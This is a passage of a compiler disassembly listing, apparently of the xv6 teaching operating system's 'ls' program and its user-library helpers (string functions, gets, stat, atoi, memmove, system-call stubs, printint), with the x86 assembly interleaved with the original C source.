f1: 5d pop %ebp
f2: c3 ret
f3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000100 <ls>:
void ls(char *path) {
100: 55 push %ebp
101: 89 e5 mov %esp,%ebp
103: 57 push %edi
104: 56 push %esi
105: 53 push %ebx
106: 81 ec 64 02 00 00 sub $0x264,%esp
10c: 8b 7d 08 mov 0x8(%ebp),%edi
char buf[512], *p;
int fd;
struct dirent de;
struct stat st;
if((fd = open(path, 0)) < 0){
10f: 6a 00 push $0x0
111: 57 push %edi
112: e8 ab 04 00 00 call 5c2 <open>
117: 83 c4 10 add $0x10,%esp
11a: 85 c0 test %eax,%eax
11c: 0f 88 9e 01 00 00 js 2c0 <ls+0x1c0>
printf(2, "ls: cannot open %s\n", path);
return;
}
if(fstat(fd, &st) < 0){
122: 8d b5 d4 fd ff ff lea -0x22c(%ebp),%esi
128: 83 ec 08 sub $0x8,%esp
12b: 89 c3 mov %eax,%ebx
12d: 56 push %esi
12e: 50 push %eax
12f: e8 a6 04 00 00 call 5da <fstat>
134: 83 c4 10 add $0x10,%esp
137: 85 c0 test %eax,%eax
139: 0f 88 c1 01 00 00 js 300 <ls+0x200>
printf(2, "ls: cannot stat %s\n", path);
close(fd);
return;
}
switch(st.type){
13f: 0f b7 85 d4 fd ff ff movzwl -0x22c(%ebp),%eax
146: 66 83 f8 01 cmp $0x1,%ax
14a: 74 54 je 1a0 <ls+0xa0>
14c: 66 83 f8 02 cmp $0x2,%ax
150: 75 37 jne 189 <ls+0x89>
case T_FILE:
printf(1, "%s %d %d %d\n", fmtname(path), st.type, st.ino, st.size);
152: 83 ec 0c sub $0xc,%esp
155: 8b 95 e4 fd ff ff mov -0x21c(%ebp),%edx
15b: 8b b5 dc fd ff ff mov -0x224(%ebp),%esi
161: 57 push %edi
162: 89 95 b4 fd ff ff mov %edx,-0x24c(%ebp)
168: e8 f3 fe ff ff call 60 <fmtname>
16d: 8b 95 b4 fd ff ff mov -0x24c(%ebp),%edx
173: 59 pop %ecx
174: 5f pop %edi
175: 52 push %edx
176: 56 push %esi
177: 6a 02 push $0x2
179: 50 push %eax
17a: 68 18 0a 00 00 push $0xa18
17f: 6a 01 push $0x1
181: e8 4a 05 00 00 call 6d0 <printf>
break;
186: 83 c4 20 add $0x20,%esp
}
printf(1, "%s %d %d %d\n", fmtname(buf), st.type, st.ino, st.size);
}
break;
}
close(fd);
189: 83 ec 0c sub $0xc,%esp
18c: 53 push %ebx
18d: e8 18 04 00 00 call 5aa <close>
192: 83 c4 10 add $0x10,%esp
}
195: 8d 65 f4 lea -0xc(%ebp),%esp
198: 5b pop %ebx
199: 5e pop %esi
19a: 5f pop %edi
19b: 5d pop %ebp
19c: c3 ret
19d: 8d 76 00 lea 0x0(%esi),%esi
case T_FILE:
printf(1, "%s %d %d %d\n", fmtname(path), st.type, st.ino, st.size);
break;
case T_DIR:
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
1a0: 83 ec 0c sub $0xc,%esp
1a3: 57 push %edi
1a4: e8 17 02 00 00 call 3c0 <strlen>
1a9: 83 c0 10 add $0x10,%eax
1ac: 83 c4 10 add $0x10,%esp
1af: 3d 00 02 00 00 cmp $0x200,%eax
1b4: 0f 87 26 01 00 00 ja 2e0 <ls+0x1e0>
printf(1, "ls: path too long\n");
break;
}
strcpy(buf, path);
1ba: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
1c0: 83 ec 08 sub $0x8,%esp
1c3: 57 push %edi
1c4: 8d bd c4 fd ff ff lea -0x23c(%ebp),%edi
1ca: 50 push %eax
1cb: e8 70 01 00 00 call 340 <strcpy>
p = buf+strlen(buf);
1d0: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
1d6: 89 04 24 mov %eax,(%esp)
1d9: e8 e2 01 00 00 call 3c0 <strlen>
1de: 8d 95 e8 fd ff ff lea -0x218(%ebp),%edx
*p++ = '/';
while(read(fd, &de, sizeof(de)) == sizeof(de)){
1e4: 83 c4 10 add $0x10,%esp
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
printf(1, "ls: path too long\n");
break;
}
strcpy(buf, path);
p = buf+strlen(buf);
1e7: 8d 0c 02 lea (%edx,%eax,1),%ecx
*p++ = '/';
1ea: 8d 84 05 e9 fd ff ff lea -0x217(%ebp,%eax,1),%eax
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
printf(1, "ls: path too long\n");
break;
}
strcpy(buf, path);
p = buf+strlen(buf);
1f1: 89 8d a8 fd ff ff mov %ecx,-0x258(%ebp)
*p++ = '/';
1f7: 89 85 a4 fd ff ff mov %eax,-0x25c(%ebp)
1fd: c6 01 2f movb $0x2f,(%ecx)
while(read(fd, &de, sizeof(de)) == sizeof(de)){
200: 83 ec 04 sub $0x4,%esp
203: 6a 10 push $0x10
205: 57 push %edi
206: 53 push %ebx
207: e8 8e 03 00 00 call 59a <read>
20c: 83 c4 10 add $0x10,%esp
20f: 83 f8 10 cmp $0x10,%eax
212: 0f 85 71 ff ff ff jne 189 <ls+0x89>
if(de.inum == 0)
218: 66 83 bd c4 fd ff ff cmpw $0x0,-0x23c(%ebp)
21f: 00
220: 74 de je 200 <ls+0x100>
continue;
memmove(p, de.name, DIRSIZ);
222: 8d 85 c6 fd ff ff lea -0x23a(%ebp),%eax
228: 83 ec 04 sub $0x4,%esp
22b: 6a 0e push $0xe
22d: 50 push %eax
22e: ff b5 a4 fd ff ff pushl -0x25c(%ebp)
234: e8 17 03 00 00 call 550 <memmove>
p[DIRSIZ] = 0;
239: 8b 85 a8 fd ff ff mov -0x258(%ebp),%eax
23f: c6 40 0f 00 movb $0x0,0xf(%eax)
if(stat(buf, &st) < 0){
243: 58 pop %eax
244: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
24a: 5a pop %edx
24b: 56 push %esi
24c: 50 push %eax
24d: e8 6e 02 00 00 call 4c0 <stat>
252: 83 c4 10 add $0x10,%esp
255: 85 c0 test %eax,%eax
257: 0f 88 c3 00 00 00 js 320 <ls+0x220>
printf(1, "ls: cannot stat %s\n", buf);
continue;
}
printf(1, "%s %d %d %d\n", fmtname(buf), st.type, st.ino, st.size);
25d: 8b 8d e4 fd ff ff mov -0x21c(%ebp),%ecx
263: 0f bf 85 d4 fd ff ff movswl -0x22c(%ebp),%eax
26a: 83 ec 0c sub $0xc,%esp
26d: 8b 95 dc fd ff ff mov -0x224(%ebp),%edx
273: 89 8d ac fd ff ff mov %ecx,-0x254(%ebp)
279: 8d 8d e8 fd ff ff lea -0x218(%ebp),%ecx
27f: 89 95 b0 fd ff ff mov %edx,-0x250(%ebp)
285: 89 85 b4 fd ff ff mov %eax,-0x24c(%ebp)
28b: 51 push %ecx
28c: e8 cf fd ff ff call 60 <fmtname>
291: 5a pop %edx
292: 8b 95 b0 fd ff ff mov -0x250(%ebp),%edx
298: 59 pop %ecx
299: 8b 8d ac fd ff ff mov -0x254(%ebp),%ecx
29f: 51 push %ecx
2a0: 52 push %edx
2a1: ff b5 b4 fd ff ff pushl -0x24c(%ebp)
2a7: 50 push %eax
2a8: 68 18 0a 00 00 push $0xa18
2ad: 6a 01 push $0x1
2af: e8 1c 04 00 00 call 6d0 <printf>
2b4: 83 c4 20 add $0x20,%esp
2b7: e9 44 ff ff ff jmp 200 <ls+0x100>
2bc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
int fd;
struct dirent de;
struct stat st;
if((fd = open(path, 0)) < 0){
printf(2, "ls: cannot open %s\n", path);
2c0: 83 ec 04 sub $0x4,%esp
2c3: 57 push %edi
2c4: 68 f0 09 00 00 push $0x9f0
2c9: 6a 02 push $0x2
2cb: e8 00 04 00 00 call 6d0 <printf>
return;
2d0: 83 c4 10 add $0x10,%esp
printf(1, "%s %d %d %d\n", fmtname(buf), st.type, st.ino, st.size);
}
break;
}
close(fd);
}
2d3: 8d 65 f4 lea -0xc(%ebp),%esp
2d6: 5b pop %ebx
2d7: 5e pop %esi
2d8: 5f pop %edi
2d9: 5d pop %ebp
2da: c3 ret
2db: 90 nop
2dc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
printf(1, "%s %d %d %d\n", fmtname(path), st.type, st.ino, st.size);
break;
case T_DIR:
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
printf(1, "ls: path too long\n");
2e0: 83 ec 08 sub $0x8,%esp
2e3: 68 25 0a 00 00 push $0xa25
2e8: 6a 01 push $0x1
2ea: e8 e1 03 00 00 call 6d0 <printf>
break;
2ef: 83 c4 10 add $0x10,%esp
2f2: e9 92 fe ff ff jmp 189 <ls+0x89>
2f7: 89 f6 mov %esi,%esi
2f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
printf(2, "ls: cannot open %s\n", path);
return;
}
if(fstat(fd, &st) < 0){
printf(2, "ls: cannot stat %s\n", path);
300: 83 ec 04 sub $0x4,%esp
303: 57 push %edi
304: 68 04 0a 00 00 push $0xa04
309: 6a 02 push $0x2
30b: e8 c0 03 00 00 call 6d0 <printf>
close(fd);
310: 89 1c 24 mov %ebx,(%esp)
313: e8 92 02 00 00 call 5aa <close>
return;
318: 83 c4 10 add $0x10,%esp
31b: e9 75 fe ff ff jmp 195 <ls+0x95>
if(de.inum == 0)
continue;
memmove(p, de.name, DIRSIZ);
p[DIRSIZ] = 0;
if(stat(buf, &st) < 0){
printf(1, "ls: cannot stat %s\n", buf);
320: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
326: 83 ec 04 sub $0x4,%esp
329: 50 push %eax
32a: 68 04 0a 00 00 push $0xa04
32f: 6a 01 push $0x1
331: e8 9a 03 00 00 call 6d0 <printf>
continue;
336: 83 c4 10 add $0x10,%esp
339: e9 c2 fe ff ff jmp 200 <ls+0x100>
33e: 66 90 xchg %ax,%ax
00000340 <strcpy>:
#include "user.h"
#include "x86.h"
char*
strcpy(char *s, char *t)
{
340: 55 push %ebp
341: 89 e5 mov %esp,%ebp
343: 53 push %ebx
344: 8b 45 08 mov 0x8(%ebp),%eax
347: 8b 4d 0c mov 0xc(%ebp),%ecx
char *os;
os = s;
while((*s++ = *t++) != 0)
34a: 89 c2 mov %eax,%edx
34c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
350: 83 c1 01 add $0x1,%ecx
353: 0f b6 59 ff movzbl -0x1(%ecx),%ebx
357: 83 c2 01 add $0x1,%edx
35a: 84 db test %bl,%bl
35c: 88 5a ff mov %bl,-0x1(%edx)
35f: 75 ef jne 350 <strcpy+0x10>
;
return os;
}
361: 5b pop %ebx
362: 5d pop %ebp
363: c3 ret
364: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
36a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi
00000370 <strcmp>:
int
strcmp(const char *p, const char *q)
{
370: 55 push %ebp
371: 89 e5 mov %esp,%ebp
373: 56 push %esi
374: 53 push %ebx
375: 8b 55 08 mov 0x8(%ebp),%edx
378: 8b 4d 0c mov 0xc(%ebp),%ecx
while(*p && *p == *q)
37b: 0f b6 02 movzbl (%edx),%eax
37e: 0f b6 19 movzbl (%ecx),%ebx
381: 84 c0 test %al,%al
383: 75 1e jne 3a3 <strcmp+0x33>
385: eb 29 jmp 3b0 <strcmp+0x40>
387: 89 f6 mov %esi,%esi
389: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
p++, q++;
390: 83 c2 01 add $0x1,%edx
}
int
strcmp(const char *p, const char *q)
{
while(*p && *p == *q)
393: 0f b6 02 movzbl (%edx),%eax
p++, q++;
396: 8d 71 01 lea 0x1(%ecx),%esi
}
int
strcmp(const char *p, const char *q)
{
while(*p && *p == *q)
399: 0f b6 59 01 movzbl 0x1(%ecx),%ebx
39d: 84 c0 test %al,%al
39f: 74 0f je 3b0 <strcmp+0x40>
3a1: 89 f1 mov %esi,%ecx
3a3: 38 d8 cmp %bl,%al
3a5: 74 e9 je 390 <strcmp+0x20>
p++, q++;
return (uchar)*p - (uchar)*q;
3a7: 29 d8 sub %ebx,%eax
}
3a9: 5b pop %ebx
3aa: 5e pop %esi
3ab: 5d pop %ebp
3ac: c3 ret
3ad: 8d 76 00 lea 0x0(%esi),%esi
}
int
strcmp(const char *p, const char *q)
{
while(*p && *p == *q)
3b0: 31 c0 xor %eax,%eax
p++, q++;
return (uchar)*p - (uchar)*q;
3b2: 29 d8 sub %ebx,%eax
}
3b4: 5b pop %ebx
3b5: 5e pop %esi
3b6: 5d pop %ebp
3b7: c3 ret
3b8: 90 nop
3b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
000003c0 <strlen>:
uint
strlen(char *s)
{
3c0: 55 push %ebp
3c1: 89 e5 mov %esp,%ebp
3c3: 8b 4d 08 mov 0x8(%ebp),%ecx
int n;
for(n = 0; s[n]; n++)
3c6: 80 39 00 cmpb $0x0,(%ecx)
3c9: 74 12 je 3dd <strlen+0x1d>
3cb: 31 d2 xor %edx,%edx
3cd: 8d 76 00 lea 0x0(%esi),%esi
3d0: 83 c2 01 add $0x1,%edx
3d3: 80 3c 11 00 cmpb $0x0,(%ecx,%edx,1)
3d7: 89 d0 mov %edx,%eax
3d9: 75 f5 jne 3d0 <strlen+0x10>
;
return n;
}
3db: 5d pop %ebp
3dc: c3 ret
uint
strlen(char *s)
{
int n;
for(n = 0; s[n]; n++)
3dd: 31 c0 xor %eax,%eax
;
return n;
}
3df: 5d pop %ebp
3e0: c3 ret
3e1: eb 0d jmp 3f0 <memset>
3e3: 90 nop
3e4: 90 nop
3e5: 90 nop
3e6: 90 nop
3e7: 90 nop
3e8: 90 nop
3e9: 90 nop
3ea: 90 nop
3eb: 90 nop
3ec: 90 nop
3ed: 90 nop
3ee: 90 nop
3ef: 90 nop
000003f0 <memset>:
void*
memset(void *dst, int c, uint n)
{
3f0: 55 push %ebp
3f1: 89 e5 mov %esp,%ebp
3f3: 57 push %edi
3f4: 8b 55 08 mov 0x8(%ebp),%edx
}
static inline void
stosb(void *addr, int data, int cnt)
{
asm volatile("cld; rep stosb" :
3f7: 8b 4d 10 mov 0x10(%ebp),%ecx
3fa: 8b 45 0c mov 0xc(%ebp),%eax
3fd: 89 d7 mov %edx,%edi
3ff: fc cld
400: f3 aa rep stos %al,%es:(%edi)
stosb(dst, c, n);
return dst;
}
402: 89 d0 mov %edx,%eax
404: 5f pop %edi
405: 5d pop %ebp
406: c3 ret
407: 89 f6 mov %esi,%esi
409: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000410 <strchr>:
char*
strchr(const char *s, char c)
{
410: 55 push %ebp
411: 89 e5 mov %esp,%ebp
413: 53 push %ebx
414: 8b 45 08 mov 0x8(%ebp),%eax
417: 8b 5d 0c mov 0xc(%ebp),%ebx
for(; *s; s++)
41a: 0f b6 10 movzbl (%eax),%edx
41d: 84 d2 test %dl,%dl
41f: 74 1d je 43e <strchr+0x2e>
if(*s == c)
421: 38 d3 cmp %dl,%bl
423: 89 d9 mov %ebx,%ecx
425: 75 0d jne 434 <strchr+0x24>
427: eb 17 jmp 440 <strchr+0x30>
429: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
430: 38 ca cmp %cl,%dl
432: 74 0c je 440 <strchr+0x30>
}
char*
strchr(const char *s, char c)
{
for(; *s; s++)
434: 83 c0 01 add $0x1,%eax
437: 0f b6 10 movzbl (%eax),%edx
43a: 84 d2 test %dl,%dl
43c: 75 f2 jne 430 <strchr+0x20>
if(*s == c)
return (char*)s;
return 0;
43e: 31 c0 xor %eax,%eax
}
440: 5b pop %ebx
441: 5d pop %ebp
442: c3 ret
443: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
449: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000450 <gets>:
char*
gets(char *buf, int max)
{
450: 55 push %ebp
451: 89 e5 mov %esp,%ebp
453: 57 push %edi
454: 56 push %esi
455: 53 push %ebx
int i, cc;
char c;
for(i=0; i+1 < max; ){
456: 31 f6 xor %esi,%esi
cc = read(0, &c, 1);
458: 8d 7d e7 lea -0x19(%ebp),%edi
return 0;
}
char*
gets(char *buf, int max)
{
45b: 83 ec 1c sub $0x1c,%esp
int i, cc;
char c;
for(i=0; i+1 < max; ){
45e: eb 29 jmp 489 <gets+0x39>
cc = read(0, &c, 1);
460: 83 ec 04 sub $0x4,%esp
463: 6a 01 push $0x1
465: 57 push %edi
466: 6a 00 push $0x0
468: e8 2d 01 00 00 call 59a <read>
if(cc < 1)
46d: 83 c4 10 add $0x10,%esp
470: 85 c0 test %eax,%eax
472: 7e 1d jle 491 <gets+0x41>
break;
buf[i++] = c;
474: 0f b6 45 e7 movzbl -0x19(%ebp),%eax
478: 8b 55 08 mov 0x8(%ebp),%edx
47b: 89 de mov %ebx,%esi
if(c == '\n' || c == '\r')
47d: 3c 0a cmp $0xa,%al
for(i=0; i+1 < max; ){
cc = read(0, &c, 1);
if(cc < 1)
break;
buf[i++] = c;
47f: 88 44 1a ff mov %al,-0x1(%edx,%ebx,1)
if(c == '\n' || c == '\r')
483: 74 1b je 4a0 <gets+0x50>
485: 3c 0d cmp $0xd,%al
487: 74 17 je 4a0 <gets+0x50>
gets(char *buf, int max)
{
int i, cc;
char c;
for(i=0; i+1 < max; ){
489: 8d 5e 01 lea 0x1(%esi),%ebx
48c: 3b 5d 0c cmp 0xc(%ebp),%ebx
48f: 7c cf jl 460 <gets+0x10>
break;
buf[i++] = c;
if(c == '\n' || c == '\r')
break;
}
buf[i] = '\0';
491: 8b 45 08 mov 0x8(%ebp),%eax
494: c6 04 30 00 movb $0x0,(%eax,%esi,1)
return buf;
}
498: 8d 65 f4 lea -0xc(%ebp),%esp
49b: 5b pop %ebx
49c: 5e pop %esi
49d: 5f pop %edi
49e: 5d pop %ebp
49f: c3 ret
break;
buf[i++] = c;
if(c == '\n' || c == '\r')
break;
}
buf[i] = '\0';
4a0: 8b 45 08 mov 0x8(%ebp),%eax
gets(char *buf, int max)
{
int i, cc;
char c;
for(i=0; i+1 < max; ){
4a3: 89 de mov %ebx,%esi
break;
buf[i++] = c;
if(c == '\n' || c == '\r')
break;
}
buf[i] = '\0';
4a5: c6 04 30 00 movb $0x0,(%eax,%esi,1)
return buf;
}
4a9: 8d 65 f4 lea -0xc(%ebp),%esp
4ac: 5b pop %ebx
4ad: 5e pop %esi
4ae: 5f pop %edi
4af: 5d pop %ebp
4b0: c3 ret
4b1: eb 0d jmp 4c0 <stat>
4b3: 90 nop
4b4: 90 nop
4b5: 90 nop
4b6: 90 nop
4b7: 90 nop
4b8: 90 nop
4b9: 90 nop
4ba: 90 nop
4bb: 90 nop
4bc: 90 nop
4bd: 90 nop
4be: 90 nop
4bf: 90 nop
000004c0 <stat>:
int
stat(char *n, struct stat *st)
{
4c0: 55 push %ebp
4c1: 89 e5 mov %esp,%ebp
4c3: 56 push %esi
4c4: 53 push %ebx
int fd;
int r;
fd = open(n, O_RDONLY);
4c5: 83 ec 08 sub $0x8,%esp
4c8: 6a 00 push $0x0
4ca: ff 75 08 pushl 0x8(%ebp)
4cd: e8 f0 00 00 00 call 5c2 <open>
if(fd < 0)
4d2: 83 c4 10 add $0x10,%esp
4d5: 85 c0 test %eax,%eax
4d7: 78 27 js 500 <stat+0x40>
return -1;
r = fstat(fd, st);
4d9: 83 ec 08 sub $0x8,%esp
4dc: ff 75 0c pushl 0xc(%ebp)
4df: 89 c3 mov %eax,%ebx
4e1: 50 push %eax
4e2: e8 f3 00 00 00 call 5da <fstat>
4e7: 89 c6 mov %eax,%esi
close(fd);
4e9: 89 1c 24 mov %ebx,(%esp)
4ec: e8 b9 00 00 00 call 5aa <close>
return r;
4f1: 83 c4 10 add $0x10,%esp
4f4: 89 f0 mov %esi,%eax
}
4f6: 8d 65 f8 lea -0x8(%ebp),%esp
4f9: 5b pop %ebx
4fa: 5e pop %esi
4fb: 5d pop %ebp
4fc: c3 ret
4fd: 8d 76 00 lea 0x0(%esi),%esi
int fd;
int r;
fd = open(n, O_RDONLY);
if(fd < 0)
return -1;
500: b8 ff ff ff ff mov $0xffffffff,%eax
505: eb ef jmp 4f6 <stat+0x36>
507: 89 f6 mov %esi,%esi
509: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000510 <atoi>:
return r;
}
int
atoi(const char *s)
{
510: 55 push %ebp
511: 89 e5 mov %esp,%ebp
513: 53 push %ebx
514: 8b 4d 08 mov 0x8(%ebp),%ecx
int n;
n = 0;
while('0' <= *s && *s <= '9')
517: 0f be 11 movsbl (%ecx),%edx
51a: 8d 42 d0 lea -0x30(%edx),%eax
51d: 3c 09 cmp $0x9,%al
51f: b8 00 00 00 00 mov $0x0,%eax
524: 77 1f ja 545 <atoi+0x35>
526: 8d 76 00 lea 0x0(%esi),%esi
529: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
n = n*10 + *s++ - '0';
530: 8d 04 80 lea (%eax,%eax,4),%eax
533: 83 c1 01 add $0x1,%ecx
536: 8d 44 42 d0 lea -0x30(%edx,%eax,2),%eax
atoi(const char *s)
{
int n;
n = 0;
while('0' <= *s && *s <= '9')
53a: 0f be 11 movsbl (%ecx),%edx
53d: 8d 5a d0 lea -0x30(%edx),%ebx
540: 80 fb 09 cmp $0x9,%bl
543: 76 eb jbe 530 <atoi+0x20>
n = n*10 + *s++ - '0';
return n;
}
545: 5b pop %ebx
546: 5d pop %ebp
547: c3 ret
548: 90 nop
549: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
00000550 <memmove>:
void*
memmove(void *vdst, void *vsrc, int n)
{
550: 55 push %ebp
551: 89 e5 mov %esp,%ebp
553: 56 push %esi
554: 53 push %ebx
555: 8b 5d 10 mov 0x10(%ebp),%ebx
558: 8b 45 08 mov 0x8(%ebp),%eax
55b: 8b 75 0c mov 0xc(%ebp),%esi
char *dst, *src;
dst = vdst;
src = vsrc;
while(n-- > 0)
55e: 85 db test %ebx,%ebx
560: 7e 14 jle 576 <memmove+0x26>
562: 31 d2 xor %edx,%edx
564: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
*dst++ = *src++;
568: 0f b6 0c 16 movzbl (%esi,%edx,1),%ecx
56c: 88 0c 10 mov %cl,(%eax,%edx,1)
56f: 83 c2 01 add $0x1,%edx
{
char *dst, *src;
dst = vdst;
src = vsrc;
while(n-- > 0)
572: 39 da cmp %ebx,%edx
574: 75 f2 jne 568 <memmove+0x18>
*dst++ = *src++;
return vdst;
}
576: 5b pop %ebx
577: 5e pop %esi
578: 5d pop %ebp
579: c3 ret
0000057a <fork>:
name: \
movl $SYS_ ## name, %eax; \
int $T_SYSCALL; \
ret
SYSCALL(fork)
57a: b8 01 00 00 00 mov $0x1,%eax
57f: cd 40 int $0x40
581: c3 ret
00000582 <exit>:
SYSCALL(exit)
582: b8 02 00 00 00 mov $0x2,%eax
587: cd 40 int $0x40
589: c3 ret
0000058a <wait>:
SYSCALL(wait)
58a: b8 03 00 00 00 mov $0x3,%eax
58f: cd 40 int $0x40
591: c3 ret
00000592 <pipe>:
SYSCALL(pipe)
592: b8 04 00 00 00 mov $0x4,%eax
597: cd 40 int $0x40
599: c3 ret
0000059a <read>:
SYSCALL(read)
59a: b8 05 00 00 00 mov $0x5,%eax
59f: cd 40 int $0x40
5a1: c3 ret
000005a2 <write>:
SYSCALL(write)
5a2: b8 10 00 00 00 mov $0x10,%eax
5a7: cd 40 int $0x40
5a9: c3 ret
000005aa <close>:
SYSCALL(close)
5aa: b8 15 00 00 00 mov $0x15,%eax
5af: cd 40 int $0x40
5b1: c3 ret
000005b2 <kill>:
SYSCALL(kill)
5b2: b8 06 00 00 00 mov $0x6,%eax
5b7: cd 40 int $0x40
5b9: c3 ret
000005ba <exec>:
SYSCALL(exec)
5ba: b8 07 00 00 00 mov $0x7,%eax
5bf: cd 40 int $0x40
5c1: c3 ret
000005c2 <open>:
SYSCALL(open)
5c2: b8 0f 00 00 00 mov $0xf,%eax
5c7: cd 40 int $0x40
5c9: c3 ret
000005ca <mknod>:
SYSCALL(mknod)
5ca: b8 11 00 00 00 mov $0x11,%eax
5cf: cd 40 int $0x40
5d1: c3 ret
000005d2 <unlink>:
SYSCALL(unlink)
5d2: b8 12 00 00 00 mov $0x12,%eax
5d7: cd 40 int $0x40
5d9: c3 ret
000005da <fstat>:
SYSCALL(fstat)
5da: b8 08 00 00 00 mov $0x8,%eax
5df: cd 40 int $0x40
5e1: c3 ret
000005e2 <link>:
SYSCALL(link)
5e2: b8 13 00 00 00 mov $0x13,%eax
5e7: cd 40 int $0x40
5e9: c3 ret
000005ea <mkdir>:
SYSCALL(mkdir)
5ea: b8 14 00 00 00 mov $0x14,%eax
5ef: cd 40 int $0x40
5f1: c3 ret
000005f2 <chdir>:
SYSCALL(chdir)
5f2: b8 09 00 00 00 mov $0x9,%eax
5f7: cd 40 int $0x40
5f9: c3 ret
000005fa <dup>:
SYSCALL(dup)
5fa: b8 0a 00 00 00 mov $0xa,%eax
5ff: cd 40 int $0x40
601: c3 ret
00000602 <getpid>:
SYSCALL(getpid)
602: b8 0b 00 00 00 mov $0xb,%eax
607: cd 40 int $0x40
609: c3 ret
0000060a <sbrk>:
SYSCALL(sbrk)
60a: b8 0c 00 00 00 mov $0xc,%eax
60f: cd 40 int $0x40
611: c3 ret
00000612 <sleep>:
SYSCALL(sleep)
612: b8 0d 00 00 00 mov $0xd,%eax
617: cd 40 int $0x40
619: c3 ret
0000061a <uptime>:
SYSCALL(uptime)
61a: b8 0e 00 00 00 mov $0xe,%eax
61f: cd 40 int $0x40
621: c3 ret
622: 66 90 xchg %ax,%ax
624: 66 90 xchg %ax,%ax
626: 66 90 xchg %ax,%ax
628: 66 90 xchg %ax,%ax
62a: 66 90 xchg %ax,%ax
62c: 66 90 xchg %ax,%ax
62e: 66 90 xchg %ax,%ax
00000630 <printint>:
write(fd, &c, 1);
}
static void
printint(int fd, int xx, int base, int sgn)
{
630: 55 push %ebp
631: 89 e5 mov %esp,%ebp
633: 57 push %edi
634: 56 push %esi
635: 53 push %ebx
636: 89 c6 mov %eax,%esi
638: 83 ec 3c sub $0x3c,%esp
char buf[16];
int i, neg;
uint x;
neg = 0;
if(sgn && xx < 0){
63b: 8b 5d 08 mov 0x8(%ebp),%ebx
63e: 85 db test %ebx,%ebx
640: 74 7e je 6c0 <printint+0x90>
642: 89 d0 mov %edx,%eax
644: c1 e8 1f shr $0x1f,%eax
647: 84 c0 test %al,%al
649: 74 75 je 6c0 <printint+0x90>
neg = 1;
x = -xx;
64b: 89 d0 mov %edx,%eax
int i, neg;
uint x;
neg = 0;
if(sgn && xx < 0){
neg = 1;
64d: c7 45 c4 01 00 00 00 movl $0x1,-0x3c(%ebp)
x = -xx;
654: f7 d8 neg %eax
656: 89 75 c0 mov %esi,-0x40(%ebp)
} else {
x = xx;
}
i = 0;
659: 31 ff xor %edi,%edi
65b: 8d 5d d7 lea -0x29(%ebp),%ebx
65e: 89 ce mov %ecx,%esi
660: eb 08 jmp 66a <printint+0x3a>
662: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
do{
buf[i++] = digits[x % base];
668: 89 cf mov %ecx,%edi
66a: 31 d2 xor %edx,%edx
66c: 8d 4f 01 lea 0x1(%edi),%ecx
66f: f7 f6 div %esi
671: 0f b6 92 44 0a 00 00 movzbl 0xa44(%edx),%edx
}while((x /= base) != 0);
678: 85 c0 test %eax,%eax
x = xx;
}
i = 0;
do{
buf[i++] = digits[x % base];
67a: 88 14 0b mov %dl,(%ebx,%ecx,1)
}while((x /= base) != 0);
67d: 75 e9 jne 668 <printint+0x38>
if(neg)
67f: 8b 45 c4 mov -0x3c(%ebp),%eax
682: 8b 75 c0 mov -0x40(%ebp),%esi
685: 85 c0 test %eax,%eax
687: 74 08 je 691 <printint+0x61>
buf[i++] = '-';
689: c6 44 0d d8 2d movb $0x2d,-0x28(%ebp,%ecx,1)
68e: 8d 4f 02 lea 0x2(%edi),%ecx
691: 8d 7c 0d d7 lea -0x29(%ebp,%ecx,1),%edi
695: 8d 76 00 lea 0x0(%esi),%esi
698: 0f b6 07 movzbl (%edi),%eax
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
69b: 83 ec 04 sub $0x4,%esp
69e: 83 ef 01 sub $0x1,%edi
6a1: 6a 01 push $0x1
6a3: 53 push %ebx
6a4: 56 push %esi
6a5: 88 45 d7 mov %al,-0x29(%ebp)
6a8: e8 f5 fe ff ff call 5a2 <write>
buf[i++] = digits[x % base];
}while((x /= base) != 0);
if(neg)
buf[i++] = '-';
while(--i >= 0)
6ad: 83 c4 10 add $0x10,%esp
6b0: 39 df cmp %ebx,%edi
6b2: 75 e4 jne 698 <printint+0x68>
putc(fd, buf[i]);
}
6b4: 8d 65 f4 lea -0xc(%ebp),%esp
6b7: 5b pop %ebx
6b8: 5e pop %esi
6b9: 5f pop %edi
6ba: 5d pop %ebp
6bb: c3 ret
6bc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
neg = 0;
if(sgn && xx < 0){
neg = 1;
x = -xx;
} else {
x = xx;
6c0: 89 d0 mov %edx,%eax
static char digits[] = "0123456789ABCDEF";
char buf[16];
int i, neg;
uint x;
neg = 0;
6c2: c7 45 c4 00 00 00 00 movl $0x0,-0x3c(%ebp)
6c9: eb 8b jmp 656 <printint+0x26>
6cb: 90 nop
6cc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
000006d0 <printf>:
}
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, char *fmt, ...)
{
6d0: 55 push %ebp
